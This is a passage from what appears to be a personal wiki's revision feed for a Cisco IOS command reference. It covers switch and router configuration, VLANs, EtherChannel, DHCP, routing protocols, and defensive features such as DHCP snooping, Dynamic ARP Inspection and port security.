&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
 interface vlan 1&lt;br /&gt;
 interface fa0/1&lt;br /&gt;
 interface range fa0/2-3&lt;br /&gt;
 interface range fa0/2-3,g0/1&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
 no shutdown&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
 ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Default Gateway (Switch) ===&lt;br /&gt;
 ip default-gateway 192.168.0.254&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Default Route / Default Gateway (Router) ===&lt;br /&gt;
 ip route 0.0.0.0 0.0.0.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface IPv6 Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
Set the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages. &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.&lt;br /&gt;
&lt;br /&gt;
 ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Access / Trunk Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
Configures the interface as an access port and assigns it to VLAN 10.&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
Configures the interface as a trunk port using 802.1Q encapsulation.&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Trunk Allowed VLANs ===&lt;br /&gt;
Specifies which VLANs are allowed to traverse the trunk link.&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Native VLANs ===&lt;br /&gt;
Sets the native VLAN for untagged traffic on the trunk.&lt;br /&gt;
 switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Nonegotiate ===&lt;br /&gt;
Disables DTP (Dynamic Trunking Protocol) negotiation on the trunk interface.&lt;br /&gt;
 switchport nonegotiate&lt;br /&gt;
&lt;br /&gt;
== EtherChannel Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Active) ===&lt;br /&gt;
Configures interfaces to actively negotiate EtherChannel using LACP.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Passive) ===&lt;br /&gt;
Configures interfaces to respond to LACP negotiation.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode passive&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (On Mode) ===&lt;br /&gt;
Forces EtherChannel without negotiation protocol.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode on&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Access Port ===&lt;br /&gt;
Applies access configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport mode access&lt;br /&gt;
  switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Trunk ===&lt;br /&gt;
Applies trunk configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify EtherChannel ===&lt;br /&gt;
Displays EtherChannel status and summary information.&lt;br /&gt;
 show etherchannel summary&lt;br /&gt;
&lt;br /&gt;
=== Verify Port-Channel Interface ===&lt;br /&gt;
Displays detailed information about the Port-Channel interface.&lt;br /&gt;
 show interfaces port-channel 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== DHCP ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a DHCP Server on a Cisco Router ===&lt;br /&gt;
Assigns IP addresses automatically to clients on a network.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 192.168.1.1 192.168.1.10&lt;br /&gt;
! Exclude addresses that should not be assigned dynamically&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool LAN_POOL&lt;br /&gt;
 network 192.168.1.0 255.255.255.0&lt;br /&gt;
 default-router 192.168.1.1&lt;br /&gt;
 dns-server 8.8.8.8 8.8.4.4&lt;br /&gt;
 lease 7&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;excluded-address&#039;&#039;: Prevents certain IPs from being assigned (like static IPs for servers or routers).  &lt;br /&gt;
* &#039;&#039;network&#039;&#039;: Defines the subnet for DHCP clients.  &lt;br /&gt;
* &#039;&#039;default-router&#039;&#039;: Sets the gateway IP for clients.  &lt;br /&gt;
* &#039;&#039;dns-server&#039;&#039;: Specifies DNS servers for clients.  &lt;br /&gt;
* &#039;&#039;lease&#039;&#039;: Duration the IP is valid (in days).  &lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Relay (IP Helper) ===&lt;br /&gt;
Forwards DHCP requests from clients to a remote DHCP server.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface GigabitEthernet0/1&lt;br /&gt;
 ip address 192.168.1.1 255.255.255.0&lt;br /&gt;
 ip helper-address 192.168.2.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;ip helper-address&#039;&#039;: IP of the DHCP server to forward requests to.  &lt;br /&gt;
* Needed when the server is on a different subnet.  &lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Status ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip dhcp binding      ! Shows assigned IP addresses&lt;br /&gt;
show ip dhcp pool         ! Shows pool usage and statistics&lt;br /&gt;
show running-config       ! Check DHCP configuration&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Best Practices ===&lt;br /&gt;
* Exclude static IP addresses from DHCP pools.  &lt;br /&gt;
* Use &#039;&#039;DHCP relay&#039;&#039; when clients and server are on different subnets.  &lt;br /&gt;
* Monitor DHCP bindings to prevent IP conflicts.&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
Dynamic ARP Inspection (DAI) is a security feature that validates ARP packets against a trusted database (typically built by DHCP Snooping) to prevent ARP spoofing and man-in-the-middle attacks. It intercepts ARP packets on untrusted ports, checks IP-to-MAC bindings, and drops invalid ones.&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled first (DAI uses the DHCP snooping binding table for validation).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
 ip arp inspection vlan 10,20   (alternative: range)&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches, routers, DHCP servers, or devices that should bypass DAI checks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
Trusted ports forward ARP packets without validation.&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust   (optional; this is the default)&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding/DoS attacks. Default is 15 pps on untrusted ports (exceeding this can put the port in err-disable).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15   (example: 15 packets per second)&lt;br /&gt;
  ip arp inspection limit rate 100 burst interval 1   (optional: higher rate with burst)&lt;br /&gt;
&lt;br /&gt;
=== Additional Validation Checks ===&lt;br /&gt;
By default, DAI validates only IP-to-MAC bindings from the DHCP snooping database. Enable extra checks (global config mode) to catch malformed ARP packets (highly recommended for stronger security).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection validate src-mac&lt;br /&gt;
 ip arp inspection validate src-mac dst-mac ip   (common: enable all three)&lt;br /&gt;
&lt;br /&gt;
Options:&lt;br /&gt;
* &#039;&#039;&#039;src-mac&#039;&#039;&#039; — Checks source MAC in Ethernet header vs. sender MAC in ARP body (for requests and replies).&lt;br /&gt;
* &#039;&#039;&#039;dst-mac&#039;&#039;&#039; — Checks destination MAC in Ethernet header vs. target MAC in ARP body (mainly for replies).&lt;br /&gt;
* &#039;&#039;&#039;ip&#039;&#039;&#039; — Checks for invalid/unexpected IP addresses (e.g., 0.0.0.0, 255.255.255.255, multicast IPs) in ARP body.&lt;br /&gt;
&lt;br /&gt;
Each new &amp;lt;code&amp;gt;ip arp inspection validate&amp;lt;/code&amp;gt; command &#039;&#039;&#039;overrides&#039;&#039;&#039; previous ones, so specify all desired options together.&lt;br /&gt;
&lt;br /&gt;
To disable: &amp;lt;code&amp;gt;no ip arp inspection validate [src-mac] [dst-mac] [ip]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan 10&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
 show ip arp inspection statistics   (shows drops, rate limit violations)&lt;br /&gt;
 show ip arp inspection log   (logs of dropped packets)&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table (enable with &amp;lt;code&amp;gt;ip dhcp snooping&amp;lt;/code&amp;gt; + &amp;lt;code&amp;gt;ip dhcp snooping vlan ...&amp;lt;/code&amp;gt;).&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies/packets (no validation or rate limiting).&lt;br /&gt;
* Access ports should remain &#039;&#039;&#039;untrusted&#039;&#039;&#039; to enforce checks.&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039; on access ports for loop/spanning-tree protection.&lt;br /&gt;
* For non-DHCP environments, use static ARP ACLs: &amp;lt;code&amp;gt;ip arp inspection filter arp-acl-name vlan 10&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Often combined with &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039; (&amp;lt;code&amp;gt;ip verify source&amp;lt;/code&amp;gt;) on access ports to filter IP traffic based on the same bindings.&lt;br /&gt;
* Rate limiting helps prevent DoS; monitor with &amp;lt;code&amp;gt;show ip arp inspection statistics&amp;lt;/code&amp;gt; and consider &amp;lt;code&amp;gt;errdisable recovery cause arp-inspection&amp;lt;/code&amp;gt; for automatic port recovery.&lt;br /&gt;
* Additional validation (&amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;dst-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt;) catches MAC spoofing or malformed packets beyond basic binding checks—enable at least &amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt; in most production setups.&lt;br /&gt;
* DAI is ingress-only (checks incoming packets on untrusted ports).&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== View status of port security on an interface ===&lt;br /&gt;
 show port-security interface f0/1&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;br /&gt;
&lt;br /&gt;
= Routing =&lt;br /&gt;
&lt;br /&gt;
Routing is the process of forwarding packets between different networks using routing tables and routing protocols.&lt;br /&gt;
&lt;br /&gt;
=== Enable IP Routing (Layer 3 Switch) ===&lt;br /&gt;
Required on multilayer switches to allow routing between VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip routing&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
== Static Routing ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a Static Route ===&lt;br /&gt;
Manually define a path to a remote network. Here&#039;s an example using default administrative distance values listed in the section below.&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
Manually define a path to a remote network. Here&#039;s an example manually defining the administrative distance&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1 10&lt;br /&gt;
&lt;br /&gt;
Format:&lt;br /&gt;
 ip route &amp;lt;destination-network&amp;gt; &amp;lt;subnet-mask&amp;gt; &amp;lt;next-hop-ip&amp;gt; &amp;lt;administrative distance (optional)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Configure a Default Route / Default Gateway ===&lt;br /&gt;
Route used when no specific route matches the destination.&lt;br /&gt;
&lt;br /&gt;
 ip route 0.0.0.0 0.0.0.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
== Administrative Distance ==&lt;br /&gt;
&lt;br /&gt;
Determines which route is preferred when multiple routes to the same destination exist.&lt;br /&gt;
&lt;br /&gt;
Common values:&lt;br /&gt;
 Connected – 0&lt;br /&gt;
 Static – 1&lt;br /&gt;
 EIGRP – 90&lt;br /&gt;
 OSPF – 110&lt;br /&gt;
 RIP – 120&lt;br /&gt;
&lt;br /&gt;
== Dynamic Routing ==&lt;br /&gt;
&lt;br /&gt;
Dynamic routing protocols automatically exchange routing information between routers.&lt;br /&gt;
&lt;br /&gt;
=== Configure RIP v2 ===&lt;br /&gt;
Uses hop count as metric (maximum 15 hops).&lt;br /&gt;
&lt;br /&gt;
 router rip&lt;br /&gt;
  version 2&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure EIGRP ===&lt;br /&gt;
Uses bandwidth and delay as composite metric.&lt;br /&gt;
&lt;br /&gt;
 router eigrp 100&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0 0.0.0.255&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure OSPF ===&lt;br /&gt;
Link-state protocol using cost as metric.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  network 192.168.1.0 0.0.0.255 area 0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Route Summarization ==&lt;br /&gt;
&lt;br /&gt;
Route summarization (aggregation) reduces routing table size by advertising one route that represents multiple networks.&lt;br /&gt;
&lt;br /&gt;
Example networks:&lt;br /&gt;
 192.168.0.0/24&lt;br /&gt;
 192.168.1.0/24&lt;br /&gt;
 192.168.2.0/24&lt;br /&gt;
 192.168.3.0/24&lt;br /&gt;
&lt;br /&gt;
Can be summarized as:&lt;br /&gt;
 192.168.0.0/22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (EIGRP) ===&lt;br /&gt;
Applied on the outgoing interface.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0&lt;br /&gt;
  ip summary-address eigrp 100 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (OSPF ABR) ===&lt;br /&gt;
Configured under the OSPF process (on an ABR).&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  area 0 range 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Show Routing Information ==&lt;br /&gt;
&lt;br /&gt;
=== View Routing Table ===&lt;br /&gt;
&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Specific Route ===&lt;br /&gt;
&lt;br /&gt;
 show ip route 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Routing Protocol Information ===&lt;br /&gt;
&lt;br /&gt;
 show ip protocols&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1118</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1118"/>
		<updated>2026-02-23T22:25:18Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* Static Routing */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | exclude {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode (&amp;quot;elevate to root&amp;quot;) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
